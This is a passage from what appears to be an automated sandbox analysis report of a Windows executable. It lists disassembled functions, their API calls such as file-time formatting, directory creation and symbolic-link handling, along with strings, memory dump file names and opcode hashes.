Part of subcall function 003DCABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003DCB4A

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 8e67f3a49d4ceec261d21e7e4f1b04ae441499b2b9ae5bea1bfab55187813a6b
Instruction ID: b0e81f998942de3269829a2382b004372eb82108872c75070bfe1912717ac263
Opcode Fuzzy Hash: 8e67f3a49d4ceec261d21e7e4f1b04ae441499b2b9ae5bea1bfab55187813a6b
Instruction Fuzzy Hash: D5B012D737850B7D354B92003C46C37010EC0C1B10330D41FF904C4240ED801C44C032

Function 003DC7C0 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 003DC799

Part of subcall function 003DCABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003DCB39
Part of subcall function 003DCABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003DCB4A

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 5ae50ee52d35f804b7f8a8b79626987ad542e7fa400b5373a375a19ef9120ded
Instruction ID: 4cb75ed76a8f957d8da4235de6e42b1f6a91ef83239304ef2b55c23cce3e4a34
Opcode Fuzzy Hash: 5ae50ee52d35f804b7f8a8b79626987ad542e7fa400b5373a375a19ef9120ded
Instruction Fuzzy Hash: 6DB092D627840A6D214B92042902C36010EC084B10330941BB504C5240E8801C49C032

Function 003DC778 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 003DC738

Part of subcall function 003DCABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003DCB39
Part of subcall function 003DCABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003DCB4A

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 858e40ed4d69254dc91a4ab1e84c370f4bd224aec54b9cf70390ff71df793633
Instruction ID: 0029e7850bde882c148de6a313e3ea90c0fd07fb587b957e45a6ef3e73bf6e10
Opcode Fuzzy Hash: 858e40ed4d69254dc91a4ab1e84c370f4bd224aec54b9cf70390ff71df793633
Instruction Fuzzy Hash: DCA001A76B950BBC394BA2517D06C7B061DC4C5B69331A91FF91298691E9802845D631

Function 003DC76E Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 003DC738

Part of subcall function 003DCABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003DCB39
Part of subcall function 003DCABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003DCB4A

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: ec29db0ba0624b207fab912a8858e64b0a73aa7d12ba1c1566fd6e793493c7ab
Instruction ID: 0029e7850bde882c148de6a313e3ea90c0fd07fb587b957e45a6ef3e73bf6e10
Opcode Fuzzy Hash: ec29db0ba0624b207fab912a8858e64b0a73aa7d12ba1c1566fd6e793493c7ab
Instruction Fuzzy Hash: DCA001A76B950BBC394BA2517D06C7B061DC4C5B69331A91FF91298691E9802845D631

Function 003DC75A Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 003DC738

Part of subcall function 003DCABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003DCB39
Part of subcall function 003DCABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003DCB4A

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 77aabaa0b8c68c9b5485bd42b817047ee5febbd7102640ad1149da10473b2448
Instruction ID: 0029e7850bde882c148de6a313e3ea90c0fd07fb587b957e45a6ef3e73bf6e10
Opcode Fuzzy Hash: 77aabaa0b8c68c9b5485bd42b817047ee5febbd7102640ad1149da10473b2448
Instruction Fuzzy Hash: DCA001A76B950BBC394BA2517D06C7B061DC4C5B69331A91FF91298691E9802845D631

Function 003DC7B1 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 003DC799

Part of subcall function 003DCABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003DCB39
Part of subcall function 003DCABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003DCB4A

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: d33efe731e95424691990700bc22235465fb79b92962675908386672a4ef3c2d
Instruction ID: 5bdaa3cdf406f5c157582e5822701312f1c64d5e870e4944cd358388e3a512f4
Opcode Fuzzy Hash: d33efe731e95424691990700bc22235465fb79b92962675908386672a4ef3c2d
Instruction Fuzzy Hash: 30A011E32B800BBC300BA2003C02C3B020CC0C8B20330A80FF80288280AC802880C030

Function 003DC7A7 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 003DC799

Part of subcall function 003DCABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003DCB39
Part of subcall function 003DCABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003DCB4A

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: deb41eb5f02277f166b7f44982ecc05b715104ce3ea3f4a46c4e6a7bccc37286
Instruction ID: 5bdaa3cdf406f5c157582e5822701312f1c64d5e870e4944cd358388e3a512f4
Opcode Fuzzy Hash: deb41eb5f02277f166b7f44982ecc05b715104ce3ea3f4a46c4e6a7bccc37286
Instruction Fuzzy Hash: 30A011E32B800BBC300BA2003C02C3B020CC0C8B20330A80FF80288280AC802880C030

Function 003DC782 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 003DC738

Part of subcall function 003DCABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003DCB39
Part of subcall function 003DCABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003DCB4A

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 6e54ef7c7b6afb33c99484ffb180e3062455a99b755831d6a95dd70364f333da
Instruction ID: 0029e7850bde882c148de6a313e3ea90c0fd07fb587b957e45a6ef3e73bf6e10
Opcode Fuzzy Hash: 6e54ef7c7b6afb33c99484ffb180e3062455a99b755831d6a95dd70364f333da
Instruction Fuzzy Hash: DCA001A76B950BBC394BA2517D06C7B061DC4C5B69331A91FF91298691E9802845D631

Function 003C9B6A Relevance: 1.5, APIs: 1, Instructions: 7fileCOMMON

Download Yara Rule

APIs

SetEndOfFile.KERNELBASE(?,003C8EDB,?,?,-00001954), ref: 003C9B6D

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: File
String ID:
API String ID: 749574446-0
Opcode ID: 1de93288f99dab125e59c1e183ffaadbaef3961ed70d79e83945b344779975b2
Instruction ID: a77b7d196a88e8971dea6d0a84cff24a8b2cb5193db733dce8fc2aa5c87cefa1
Opcode Fuzzy Hash: 1de93288f99dab125e59c1e183ffaadbaef3961ed70d79e83945b344779975b2
Instruction Fuzzy Hash: 94B011300E000AAA8F022B38CC08C203A28EA2230AB0082A0A00AC80A2CF22C002AA00

Function 003D9023 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetCurrentDirectoryW.KERNELBASE(?,003D927A,00402120,00000000,00403122,00000006), ref: 003D9027

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: CurrentDirectory
String ID:
API String ID: 1611563598-0
Opcode ID: b910883f224866fd24c803ed340dafb40c421d41e10544362802184b0f83ae3a
Instruction ID: 0a0a9844efcdb7f3b99564510610f663a3e0acb50331a0c66f59e24b9bd1a422
Opcode Fuzzy Hash: b910883f224866fd24c803ed340dafb40c421d41e10544362802184b0f83ae3a
Instruction Fuzzy Hash: 36A0123019410646CA010B34CC09C2576545760702F0086307002C00A0CB318810E500

Function 003C94A3 Relevance: 1.3, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(000000FF,?,?,003C9473), ref: 003C94BE

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 769051e4dd16db75ce34500311cacce4abad32fcdcee375f8e9d350adfa0f941
Instruction ID: 03d25dac59f0110b45a431ac9fa638c261b82597f98f68a932d0196164ce2a6d
Opcode Fuzzy Hash: 769051e4dd16db75ce34500311cacce4abad32fcdcee375f8e9d350adfa0f941
Instruction Fuzzy Hash: 49F0BE30182B148EDB3ACA25D50DB92B3E89B11722F068B1FD0E6838E0D365AC4A8B10

Non-executed Functions

Function 003DA537 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 289timewindowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 003C12E7: GetDlgItem.USER32(00000000,00003021), ref: 003C132B
Part of subcall function 003C12E7: SetWindowTextW.USER32(00000000,003F02E4), ref: 003C1341

SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 003DA5C8
EndDialog.USER32(?,00000006), ref: 003DA5DB
GetDlgItem.USER32(?,0000006C), ref: 003DA5F7
SetFocus.USER32(00000000), ref: 003DA5FE
SetDlgItemTextW.USER32(?,00000065,?), ref: 003DA63E
SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 003DA671
FindFirstFileW.KERNEL32(?,?), ref: 003DA687
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 003DA6A5
FileTimeToSystemTime.KERNEL32(?,?), ref: 003DA6B5
GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 003DA6D2
GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 003DA6F0

Part of subcall function 003CD142: LoadStringW.USER32(?,?,00000200,?), ref: 003CD187
Part of subcall function 003CD142: LoadStringW.USER32(?,?,00000200,?), ref: 003CD19D

_swprintf.LIBCMT ref: 003DA720

Part of subcall function 003C3F5B: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 003C3F6E

SetDlgItemTextW.USER32(?,0000006A,?), ref: 003DA733
FindClose.KERNEL32(00000000), ref: 003DA736
_swprintf.LIBCMT ref: 003DA791
SetDlgItemTextW.USER32(?,00000068,?), ref: 003DA7A4
SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 003DA7BA
FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 003DA7DA
FileTimeToSystemTime.KERNEL32(?,?), ref: 003DA7EA
GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 003DA804
GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 003DA81C
_swprintf.LIBCMT ref: 003DA84D
SetDlgItemTextW.USER32(?,0000006B,?), ref: 003DA860
_swprintf.LIBCMT ref: 003DA8B0
SetDlgItemTextW.USER32(?,00000069,?), ref: 003DA8C3

Part of subcall function 003D932F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 003D9355
Part of subcall function 003D932F: GetNumberFormatW.KERNEL32(00000400,00000000,?,003FA154,?,?), ref: 003D93A4

Strings

%s %s, xrefs: 003DA77F, 003DA8A2
%s %s %s, xrefs: 003DA70E, 003DA83A
REPLACEFILEDLG, xrefs: 003DA55E

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLoadLocalStringSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
String ID: %s %s$%s %s %s$REPLACEFILEDLG
API String ID: 3227067027-1840816070
Opcode ID: 4276a7f6d2ae8d96375bad21303ebef08552f7e1ac3abc1d561f94d0e701986d
Instruction ID: 75b6d6c7c33f2382b8f02f6fda598cc97739d633dc4e08ffa0230fc797919a1a
Opcode Fuzzy Hash: 4276a7f6d2ae8d96375bad21303ebef08552f7e1ac3abc1d561f94d0e701986d
Instruction Fuzzy Hash: B6919472548309BBD622DBA0DD49FFB77ECEB4A700F04481AF689D6181D771AA05C763

Function 003C7070 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 299fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 003C7075
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,00000001), ref: 003C71D5
CloseHandle.KERNEL32(00000000), ref: 003C71E5

Part of subcall function 003C7A9D: GetCurrentProcess.KERNEL32(00000020,?), ref: 003C7AAC
Part of subcall function 003C7A9D: GetLastError.KERNEL32 ref: 003C7AF2
Part of subcall function 003C7A9D: CloseHandle.KERNEL32(?), ref: 003C7B01

CreateDirectoryW.KERNEL32(?,00000000,?,00000001), ref: 003C71F0
CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 003C72FE
DeviceIoControl.KERNEL32(00000000,000900A4,?,-00000008,00000000,00000000,?,00000000), ref: 003C732A
CloseHandle.KERNEL32(?), ref: 003C733C
GetLastError.KERNEL32(00000015,00000000,?), ref: 003C734C
RemoveDirectoryW.KERNEL32(?), ref: 003C7398
DeleteFileW.KERNEL32(?), ref: 003C73C0

Strings

SeRestorePrivilege, xrefs: 003C7096
\??\, xrefs: 003C70FB
UNC\, xrefs: 003C7120
SeCreateSymbolicLinkPrivilege, xrefs: 003C70A0

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: CloseCreateFileHandle$DirectoryErrorLast$ControlCurrentDeleteDeviceH_prologProcessRemove
String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
API String ID: 3935142422-3508440684
Opcode ID: 2cff93467830ec006a5ae8a02cb376c4a58959d73ec7fa59bd0d2a37b2e29ee1
Instruction ID: 5a0f25cc9446c576a94acd5005b8f9152e9034454919a0b428e689c99e81797f
Opcode Fuzzy Hash: 2cff93467830ec006a5ae8a02cb376c4a58959d73ec7fa59bd0d2a37b2e29ee1
Instruction Fuzzy Hash: F4B1CE75904258ABDB26DF64CC45FEE77A8AF04300F14456EFD19EB282D730AE45CBA1

Function 003C3203 Relevance: 12.9, APIs: 4, Strings: 3, Instructions: 604COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 003C320C
_memcmp.LIBVCRUNTIME ref: 003C32EF

Strings

hc%u, xrefs: 003C35EF
CMT, xrefs: 003C3904
h%u, xrefs: 003C35A1

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: H_prolog_memcmp
String ID: CMT$h%u$hc%u
API String ID: 3004599000-3282847064
Opcode ID: 4780c529ad2aecee9327454a33fbd4dc64b7ce86a0d0165558c6f81860d9c4f6
Instruction ID: 57844d98e18d9442e28301d481cc289236276e2efc5c499942e701e3f0d697db
Opcode Fuzzy Hash: 4780c529ad2aecee9327454a33fbd4dc64b7ce86a0d0165558c6f81860d9c4f6
Instruction Fuzzy Hash: 87325C715142849BDF1ADF64C886FEA37A5AF15300F04457EED8ADF282DB709E48CB60

Function 003EA35E Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 003EA4A4

Strings

1#SNAN, xrefs: 003EB6A3
1#QNAN, xrefs: 003EB6AA
1#IND, xrefs: 003EB69C
1#INF, xrefs: 003EB6B1

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

